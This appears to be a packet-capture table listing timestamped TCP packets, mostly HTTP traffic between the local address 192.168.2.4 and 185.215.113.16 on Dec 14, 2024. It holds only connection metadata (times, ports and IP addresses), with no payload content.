Dec 14, 2024 12:56:33.447521925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.447578907 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.448570013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.448633909 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.448729992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.448786020 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.449783087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.449878931 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.449956894 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.450031042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.450871944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.450962067 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.451010942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.451066017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.452037096 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.452096939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.452172995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.452233076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.453219891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.453280926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.453303099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.453366995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.454432011 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.454551935 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.454581976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.454636097 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.455667019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.455724001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.455779076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.455905914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.456794024 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.456870079 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.456899881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.456954002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.457983971 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.458065987 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.458085060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.458136082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.459098101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.459234953 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.459300995 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.460387945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.460449934 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.460522890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.460578918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.461455107 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.461513996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.461586952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.461642981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.462656021 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.462713003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.462826014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.462886095 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.463835001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.463890076 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.463942051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.464001894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.465035915 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.465096951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.465183973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.465240002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.466173887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.466228008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.466301918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.466358900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.467377901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.467442036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.467502117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.467549086 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.468523979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.468588114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.468660116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.468714952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.469728947 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.469788074 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.469840050 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.469893932 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.470885992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.470942974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.471019030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.471093893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.472068071 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.472126007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.472167015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.472217083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.473237038 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.473321915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.473372936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.473423958 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.474430084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.474487066 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.474560022 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.474612951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.475608110 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.475672007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.475722075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.475785971 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.476767063 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.476855040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.476917982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.476984978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.477955103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.478085995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.478142023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.479290009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.479348898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.479409933 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.479465961 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.480329990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.480384111 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.480454922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.480521917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.481508017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.481575012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.481626987 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.481695890 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.482652903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.482795000 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.482853889 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.483827114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.483887911 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.483962059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.484024048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.485157013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.485218048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.485250950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.485305071 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.486365080 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.486536026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.486596107 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.487376928 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.487435102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.487505913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.487562895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.488545895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.488607883 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.488660097 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.488715887 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.489717007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.489850044 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.489905119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.490961075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.491020918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.491063118 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.491122007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.492182016 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.492242098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.492315054 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.492383957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.493417978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.493534088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.493607044 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.493674994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.494499922 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.494621992 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.494679928 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.496264935 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.496359110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.496457100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.496515989 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.497195959 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.497251034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.497304916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.497365952 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.498168945 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.498317003 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.498380899 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.499202967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.499264002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.499289989 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.499346972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.500310898 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.500406027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.500411034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.500451088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.501451969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.501518965 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.543698072 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:33.576134920 CET	80	49837	34.107.221.82	192.168.2.4
Dec 14, 2024 12:56:33.632385015 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.632437944 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.632582903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.632591963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.632591963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.632683992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.632715940 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.632769108 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.633742094 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.633858919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.633936882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.634922028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.634982109 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.635066032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.635133982 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.636082888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.636157036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.636193991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.636262894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.637357950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.637432098 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.637515068 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.637566090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.638560057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.638730049 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.638837099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.639350891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.639911890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.639949083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.639969110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.640002012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.640830040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.640891075 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.640959978 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.641021013 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.641967058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.642199039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.642254114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.643167973 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.643286943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.643341064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.644320965 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.644376993 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.644387960 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.644447088 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.645595074 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.645659924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.645719051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.645782948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.646708012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.646770954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.646821976 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.646878004 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.647907972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.647969007 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.648025036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.648078918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.649158001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.649211884 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.649214983 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.649262905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.650227070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.650357962 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.650372982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.650465012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.651463032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.651518106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.651523113 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.651576996 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.652610064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.652681112 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.652688026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.652743101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.653795958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.653861046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.653918028 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.654154062 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.654956102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.655051947 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.655062914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.655128956 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.656121969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.656183004 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.656265020 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.656318903 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.657303095 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.657371998 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.657392025 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.657444954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.658449888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.658514023 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.658586979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.658638954 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.659614086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.659697056 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.659857035 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.659914017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.660804033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.660856962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.660916090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.662066936 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.662127972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.662180901 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.662420034 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.663295031 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.663367033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.663441896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.663444996 CET	49837	80	192.168.2.4	34.107.221.82
Dec 14, 2024 12:56:33.664463997 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.664527893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.664609909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.664660931 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.665805101 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.665869951 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.665950060 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.666001081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.667152882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.667236090 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.667287111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.668299913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.668354988 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.668364048 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.668421030 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.669898033 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.669986963 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.670042992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.670367956 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.670435905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.670471907 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.670516968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.671468019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.671571970 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.671600103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.671660900 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.672713041 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.672748089 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.672790051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.672790051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.673783064 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.673840046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.673871994 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.673923969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.674918890 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.674974918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.675024986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.676115036 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.676171064 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.676215887 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.676270008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.677288055 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.677377939 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.677407980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.677525043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.678503990 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.678592920 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.678647041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.679642916 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.679706097 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.679738998 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.679809093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.680850029 CET	80	49827	185.215.113.16	192.168.2.4
